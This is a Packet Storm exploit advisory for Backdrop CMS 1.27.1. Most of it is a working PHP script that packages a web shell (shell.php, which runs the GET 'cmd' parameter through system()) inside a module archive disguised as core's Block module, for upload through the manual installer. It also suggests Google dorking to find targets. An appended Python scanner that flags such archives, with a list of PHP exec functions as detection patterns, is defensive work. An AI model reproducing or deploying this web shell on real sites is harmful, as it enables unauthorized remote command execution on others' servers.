Backdrop CMS 1.27.1 Remote Command Execution

Reported by indoushka, 13 Mar 2025. Source: packetstorm (packetstorm.news).

Backdrop CMS 1.27.1 is reported vulnerable to remote command execution via PHP code injection: a module archive containing a PHP web shell is uploaded through the manual module installer and then reached directly under modules/.

Code
=============================================================================================================================================
    | # Title     : Backdrop CMS 1.27.1 PHP Code Injection Vulnerability                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or another search engine.
    
    [+] Code Description: Backdrop CMS 1.27.1 - Remote Command Execution Exploit in PHP.
        The PoC relies on the manual module installer at admin/modules/install, so it needs a session that can reach that page;
        the uploaded archive is unpacked into modules/shell/, where shell.php is then requested directly.
    
       (Related : https://packetstorm.news/files/id/178631/ Related CVE numbers:  ) .
    	
    [+] Save the code as poc.php.
    
    [+] Usage: php poc.php [url]
    
    [+] PayLoad :
    
    <?php
    // Backdrop CMS 1.27.1 - builds a module archive (shell.zip) whose shell.php passes
    // the `cmd` GET parameter to system(). The archive is uploaded by hand through the
    // manual module installer; this script only generates it. Requires the zip extension.
    
    if (!class_exists('ZipArchive')) {
        fwrite(STDERR, "The PHP zip extension (ZipArchive) is required.\n");
        exit(1);
    }
    
    function create_files() {
        // .info file copied from core's block module so the installer accepts the package.
        $info_content = <<<EOL
    type = module
    name = Block
    description = Controls the visual building blocks a page is constructed
    with. Blocks are boxes of content rendered into an area, or region, of a
    web page.
    package = Layouts
    tags[] = Blocks
    tags[] = Site Architecture
    version = BACKDROP_VERSION
    backdrop = 1.x
    
    configure = admin/structure/block
    
    ; Added by Backdrop CMS packaging script on 2024-03-07
    project = backdrop
    version = 1.27.1
    timestamp = 1709862662
    EOL;
    
        $shell_info_path = "shell/shell.info";
        if (!file_exists(dirname($shell_info_path))) {
            mkdir(dirname($shell_info_path), 0777, true); // create the directory if it does not exist
        }
        file_put_contents($shell_info_path, $info_content);
    
        // Minimal web shell: a GET form whose `cmd` value goes straight to system().
        // `\$` keeps the PHP variables literal inside the heredoc.
        $shell_content = <<<EOL
    <html>
    <body>
    <form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset(\$_GET['cmd'])) {
        system(\$_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    EOL;
    
        $shell_php_path = "shell/shell.php";
        file_put_contents($shell_php_path, $shell_content);
    
        return [$shell_info_path, $shell_php_path];
    }
    
    function create_zip($info_path, $php_path) {
        // Package both files under shell/ so the installer unpacks them to modules/shell/.
        $zip_filename = "shell.zip";
        $zip = new ZipArchive();
        if ($zip->open($zip_filename, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
            fwrite(STDERR, "Could not create $zip_filename\n");
            exit(1);
        }
        $zip->addFile($info_path, 'shell/shell.info');
        $zip->addFile($php_path, 'shell/shell.php');
        $zip->close();
        return $zip_filename;
    }
    
    function main($url) {
        echo "Backdrop CMS 1.27.1 - Remote Command Execution Exploit\n";
    
        echo "Evil module generating...\n";
        list($info_path, $php_path) = create_files();
        $zip_filename = create_zip($info_path, $php_path);
        echo "Evil module generated! $zip_filename\n";
    
        echo "Go to $url/admin/modules/install and upload the $zip_filename for Manual Installation.\n";
        echo "Your shell address: $url/modules/shell/shell.php\n";
    }
    
    if ($argc < 2) {
        echo "Usage: php {$argv[0]} [url]\n";
    } else {
        main(rtrim($argv[1], '/'));
    }
    
    ?>
    
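    The PoC gets its shell onto the server by smuggling shell.php inside a module archive. As an added example (not part of the original advisory and not code from Backdrop CMS), the following Python script, standard library only, does the defender-side check a module upload should get before or right after installation: it flags archive entries that escape the module directory, an .info file that claims `project = backdrop` (core) in a manual upload, and any PHP file that feeds request input straight into a command-execution function, which is exactly what shell.php does. The two sample archives are constructed inside the script; the list of PHP extensions and of execution functions is an assumption, not Backdrop's.

```python
"""Scan a Backdrop module .zip for the indicators carried by the PoC's shell.zip.
Added example: not part of the original advisory or of Backdrop CMS."""
import io
import re
import zipfile

# PHP functions that execute OS commands or evaluate code (assumed list).
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
# Matches calls such as  system($_GET['cmd'])  or  passthru( $_REQUEST["c"] ).
EXEC_FROM_REQUEST = re.compile(
    r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
)
# File types PHP or Backdrop will parse as PHP under modules/ (assumed list).
PHP_EXTENSIONS = (".php", ".module", ".inc", ".install", ".theme", ".phtml")


def parse_info(text: str) -> dict:
    """Minimal .info parser: `key = value`, `key[] = value` arrays, `;` comments.
    Continuation lines without '=' (the PoC's wrapped description) are skipped."""
    fields: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip().strip('"')
        if key.endswith("[]"):
            fields.setdefault(key[:-2], []).append(value)
        else:
            fields[key] = value  # later duplicate wins, as with the PoC's two `version` lines
    return fields


def scan_module_zip(data: bytes) -> list:
    """Return human-readable findings for a module archive held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for entry in zf.infolist():
            name = entry.filename
            if entry.is_dir():
                continue
            parts = name.split("/")
            if name.startswith("/") or ".." in parts:
                findings.append(f"{name}: path escapes the module directory")
                continue
            if name.endswith(".info"):
                fields = parse_info(zf.read(name).decode("utf-8", "replace"))
                # A third-party upload has no business claiming to be core.
                if fields.get("project") == "backdrop":
                    findings.append(f"{name}: claims 'project = backdrop' (core) in a manual upload")
            if name.lower().endswith(PHP_EXTENSIONS):
                text = zf.read(name).decode("utf-8", "replace")
                for m in EXEC_FROM_REQUEST.finditer(text):
                    line_no = text.count("\n", 0, m.start()) + 1
                    findings.append(f"{name}:{line_no}: request input passed straight to {m.group(1)}()")
    return findings


def _zip(files: dict) -> bytes:
    """Build an in-memory archive from {path: text}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, text in files.items():
            zf.writestr(path, text)
    return buf.getvalue()


def build_poc_like_zip() -> bytes:
    """Constructed sample laid out like the PoC's shell.zip (not the real artefact)."""
    info = ("type = module\nname = Block\nbackdrop = 1.x\n"
            "; Added by Backdrop CMS packaging script\nproject = backdrop\nversion = 1.27.1\n")
    shell = "<?php\nif(isset($_GET['cmd'])) {\n    system($_GET['cmd']);\n}\n?>\n"
    return _zip({"shell/shell.info": info, "shell/shell.php": shell})


def build_clean_zip() -> bytes:
    """Constructed control: an ordinary contributed module with nothing to flag."""
    info = "type = module\nname = Example\nbackdrop = 1.x\nproject = example\n"
    module = "<?php\nfunction example_menu() {\n  return array();\n}\n"
    return _zip({"example/example.info": info, "example/example.module": module})


if __name__ == "__main__":
    for label, data in (("poc-like", build_poc_like_zip()), ("clean", build_clean_zip())):
        print(f"{label}:", scan_module_zip(data) or "no findings")
```

    Point `scan_module_zip(open("upload.zip", "rb").read())` at a real upload, or walk modules/ after the fact and feed each file through `EXEC_FROM_REQUEST`. A clean result is not a clean bill of health: an obfuscated shell (base64, string concatenation, `$_REQUEST` reached through a variable) slips past the regex. The check catches the plain pattern this PoC ships, which is what a first triage of a suspicious module needs.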
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


Vulners AI Score: 7.7 (high risk)